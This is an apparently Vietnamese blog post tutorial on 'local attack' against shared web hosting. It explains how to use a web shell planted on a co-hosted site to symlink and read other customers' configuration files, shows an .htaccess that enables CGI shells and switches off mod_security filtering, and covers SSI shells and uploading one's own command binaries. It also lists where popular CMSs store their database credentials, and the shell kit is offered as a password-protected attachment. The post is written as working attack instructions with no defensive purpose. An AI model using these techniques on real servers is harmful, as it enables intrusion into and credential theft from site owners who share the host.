I. Symlink
1. Symlink là gì ?
Mọi người có thể hiểu như thế này symlink là tạo 1 file (thư mục) ánh xạ tới một file (thư mục) khác.
Hay nói đơn giản và dễ hiểu hơn nó tương tự như shortcut trên window :)
2. Vậy symlink để làm gì ?
Mục đich của symlink là xem file config của victim trong local attack trong trường hợp dir, cat không sử dụng được
3. Công cụ cần thiết
Rất đơn giản là 1 con shell trên 1 site nào đó cùng server với victim :)
4. Cách symlink
Ở đây mình sẽ phân ra hai trường hợp:
a. Safe mod = off
Trường hợjp này bạn chỉ cần 1 con shell có thể run được lệnh, mình thường dùng shell r57 :D
Câu lệnh symlink:
Mã:
ln -s /path/config.php 1.txt
path: đường dẫn đến file config của victim
config.php là file config của victim
b. Safe mod = on
Trường hợp này ta có thể tìm cách pypass để hạ về off
Cách pypass các bạn có thể tham khảo ở bìa viết của bác concobe
http://thegioingam.org/threads/htaccess-giup-ha-safe-mode-off.1550/
Một số cách pypass khác
http://thegioingam.org/threads/cach-bypass-mod_security-khi-local.1553/
http://thegioingam.org/threads/htaccess-ho-tro-cho-symlink-root.1552/
Trường hợp không pypass được thì ta cần sử dụng shell CGI đặc điểm của con shell này là có thể run lệnh ngay khi safe mod = on Để chạy được shell cgi các bạn tạo file htaccess ngang hàng con shell với nội dung sau:
Mã:
RewriteEngine On
RewriteBase /
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^Googlebot
RewriteRule ^(.*)$ http://google.com.vn#$1 [R=301,L]
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterSanPOST Off
</IfModule>
Options +ExecCGI
AddHandler cgi-script cgi pl noob vl dcm bmp db file kid was h4 cbg
Options +FollowSymLinks +Indexes
DirectoryIndex noob.html
Trong này có cả pypass mod security luôn nhóe :))
Rồi giờ chmod con shell cgi về 0755 và run shell và chạy lệnh symlink thôi
Tuy nhiên một số trường hợp đã có htaccess mà vẫn không run được thì các bạn đừng ngạc nhiên vì đơn giản server đó không cho chạy cgi =))
* Sau khi symlink nếu đọc file txt bị báo lỗi 403 thì các bạn tạo file htaccess ngang hàng file txt đó với nội dung như sau thì sẽ đọc được
Mã:
Options All
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
AddType text/html php
* Đường dẫn file config của một số mã nguồn (Nếu thèng ad nó chưa đổi :D )
Mã:
Vbulletin: public_html/includes/config.php
PHPBB: public_html/config.php
Joomla: public_html/configuration.php
WordPress: public_html/wp-config.php
ibp: public_html/conf_global.php
php-fusion: public_html/config.php
Smf: public_html/Settings.php
phpnuke: public_html/html/config.php
Xoops: public_html/mainfile.php
ZenCart: public_html/includes/configure.php
setidio: public_html/datas/config.php
Discuz: public_html/config/config_ucenter.php
Bo-Blog: public_html/data/config.php
Nukeviet: public_html/config.php
Trên đây chỉ là cách symlink đơn giản còn trên thực tế thì rất chi là muôn hình vạn trạng các bạn có thể google để tìm hiểu thêm nhóe :D
===============================
SSI
Tiếp theo mình sẽ giới thiếu tới các bạn con shell ssi. Trong trường hợp dir, cat... cgi không dùng được thì bạn có thể dùng shell ssi để run lệnh :D
Để biết server đó có có chạy được ssi hay không thì các bạn chạy như sau
Mã:
ip/~user/path/ssi.shtml
ip: địa chỉ IP của server
user: user của site chứa con shell
path: đường dẫn đến con shell
ssi.shtml: shell ssi
ví dụ trên server 141.101.116.63 mình có con shell nằm trong thư mục upload của site thegioingam.org và site này có user là thegioingam thì sẽ run như sau
Mã:
141.101.116.63/~thegioingam/upload/ssi.shtml
Nếu run được thì nó sẽ hiện ra con shell còn không thì bye bye =))
==============
Phương pháp thay thế
1. Thay thế lệnh
Không biết gọi là gì nữa nên tạm gọi là như vậy =))
Đơn giản là như thế này các lệnh mà ta chạy nó được gọi ra từ thư mục bin ở root của server, vậy trong trường hợp không chạy được lệnh thì ta đừng dùng lệnh được gọi từ bin của server nữa mà hãy up lên các lệnh cần dùng cho riêng ta :))
Tuy nhiên không phải server nào cũng được nhé các bạn
Ở thư mục bin trong file đính kèm mình đã gộp sẵ 1 số file cần dùng các bạn chỉ việc up lên thôi
Chú ý là dùng lệnh nào thì up file lệnh đó lên ngang hàng con shell chứ không phải là up cả cái bin lên nhóe :)
1 số trường hợp không cho up file kiểu đó thì ta nén zip lại rồi up lên sao đó dùng lệnh unzip để giải nến
Sau khi up lên cần chmod 0755 mới chạy được nhé.
Lúc này cách chạy lênh của ta sẽ như sau
Ví dụ:
Bình thường ta chạy
Không hiện ra gì cả => ta up file cat của ta lên và chạy
Nếu run được thì sẽ hiện ra list user còn không thì tức là server không cho phép hoặc là bạn chưa chmod file cat về 0755 =))
2. phpmyadmin
Đối với directadmin thì đường dẫn tới phpmyadmin sẽ là
Mã:
http://domian.com/phpmyadmin
Tuy nhiên với những thằng không có hay phải vào control panel của host mới vô đc phpmyadmin thì sao ? Ta đã lấy được file config nhưng trong đó nó có ghi pass vào host đâu :( Ta có thể dùng chức năng connect mysql của con shell tuy nhiên không phải lúc nào nó cũng làm việc Vậy cách đơn giản nhất là ta quăng luôn 1 thư mục phpmyadmin lên và run nó thôi =)) phpmyadmin các ban google để tải nhóe
Tạm thời vậy đã nhớ ra cái gì mình sẽ update tiếp =))
shell cgi ,ssi và các lệnh các bạn tải ở đính kèm, pass unrar: vhb
No comments:
Post a Comment